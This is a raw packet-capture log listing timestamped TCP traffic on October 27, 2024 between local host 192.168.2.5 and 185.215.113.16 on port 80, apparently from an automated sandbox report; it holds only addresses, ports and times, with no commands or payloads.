Oct 27, 2024 12:13:20.739104986 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.739130974 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.739136934 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.739171028 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.739187002 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.739203930 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.739242077 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.739329100 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.739727020 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.739759922 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.739794016 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.739810944 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.739826918 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.739859104 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.739892960 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.739903927 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.739903927 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.740335941 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.740370035 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.740391970 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.740411043 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.740444899 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.740479946 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.740494013 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.740513086 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.740547895 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.740556955 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.740607023 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.740889072 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.740940094 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.740973949 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.741005898 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.741008043 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.741044998 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.741080046 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.741115093 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.741120100 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.741143942 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.741585970 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.741619110 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.741645098 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.741652012 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.741686106 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.741703033 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.741719007 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.741751909 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.741786003 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.741882086 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.742141962 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.742191076 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.742192030 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.742227077 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.742259979 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.742281914 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.742292881 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.742305040 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.742327929 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.742361069 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.742398024 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.742429972 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.742430925 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.742464066 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.742508888 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.742508888 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.743108988 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.743124962 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.743139982 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.743155003 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.743169069 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.743180037 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.743191004 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.743195057 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.743195057 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.743201971 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.743213892 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.743226051 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.743258953 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.743259907 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.743283987 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.744035959 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.744049072 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.744060040 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.744071960 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.744082928 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.744093895 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.744106054 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.744116068 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.744118929 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.744163036 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.744163036 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.744801998 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.744812965 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.744822979 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.744834900 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.744846106 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.744856119 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.744867086 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.744877100 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.744878054 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.744877100 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.744889975 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.744899988 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.744911909 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.744918108 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.744918108 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.744923115 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.744941950 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.744963884 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.745759010 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.745769978 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.745779991 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.745790958 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.745803118 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.745814085 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.745824099 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.745834112 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.745843887 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.745856047 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.745857000 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.745867968 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.745878935 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.745891094 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.745903015 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.746001005 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.746632099 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.746644020 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.746654034 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.746666908 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.746678114 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.746682882 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.746690989 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.746701956 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.746714115 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.746725082 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.746735096 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.746746063 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.746754885 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.746754885 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.746756077 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.746781111 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.746814966 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.747536898 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.747549057 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.747558117 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.747569084 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.747581005 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.747596979 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.747606039 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.747607946 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.747618914 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.747629881 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.747641087 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.747642040 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.747651100 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.747663021 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.747665882 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.747682095 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.747708082 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.748449087 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.748461962 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.748471975 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.748483896 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.748496056 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.748502970 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.748507023 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.748518944 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.748531103 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.748541117 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.748552084 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.748552084 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.748564959 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.748579979 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.748594046 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.748635054 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.748635054 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.749372005 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.749383926 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.749392986 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.749404907 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.749414921 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.749423027 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.749425888 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.749437094 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.749447107 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.749459982 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.749470949 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.749483109 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.749491930 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.749495983 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.749502897 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.749545097 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.749545097 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.750287056 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.750298977 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.750304937 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.750309944 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.750314951 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.750320911 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.750325918 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.750335932 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.750341892 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.750353098 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.750365973 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.750377893 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.750389099 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.750421047 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.750421047 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.751070023 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.751082897 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.751095057 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.751118898 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.751156092 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.751229048 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.751240969 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.751251936 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.751265049 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.751276970 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.751286030 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.751290083 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.751301050 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.751307964 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.751322985 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.751327991 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.751327991 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.751400948 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.752036095 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.752047062 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.752058029 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.752070904 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.752083063 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.752110004 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.752121925 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.752121925 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.752121925 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.752135038 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.752147913 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.752160072 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.752190113 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.752190113 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.753132105 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.753146887 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.753196001 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.753218889 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.753238916 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.753238916 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.755991936 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.756027937 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.756048918 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.756067038 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.756071091 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.756123066 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.756731033 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.756788015 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.756803989 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.756827116 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.756870031 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.756917000 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.756938934 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.757002115 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.794954062 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.795006037 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.795044899 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.795098066 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.830452919 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.830507040 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.830545902 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.830579996 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.830617905 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.830617905 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.830619097 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.830733061 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.832669973 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.832740068 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.832778931 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.832804918 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.832815886 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.832885981 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.832891941 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.832920074 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.832953930 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.832988024 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.832995892 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.833023071 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.833051920 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.833056927 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.833091021 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.833126068 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:20.833149910 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:20.833188057 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:21.053740025 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:21.053814888 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:21.493462086 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:21.494487047 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.132354021 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.138004065 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.138077021 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.138113976 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.138149023 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.138195038 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.138195038 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.138226986 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.138246059 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.138279915 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.138286114 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.138443947 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.138495922 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.138578892 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.138590097 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.138641119 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.138653994 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.138675928 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.138710022 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.138719082 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.138744116 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.138777971 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.138793945 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.138813019 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.138880968 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.139213085 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.139251947 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.139283895 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.139300108 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.139352083 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.139386892 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.139420033 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.139441013 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.139471054 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.139504910 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.139538050 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.139543056 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.139543056 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.139570951 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.139610052 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.139617920 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.139619112 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.139725924 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.140326023 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.140361071 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.140403032 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.140435934 CET	49712	80	192.168.2.5	185.215.113.16
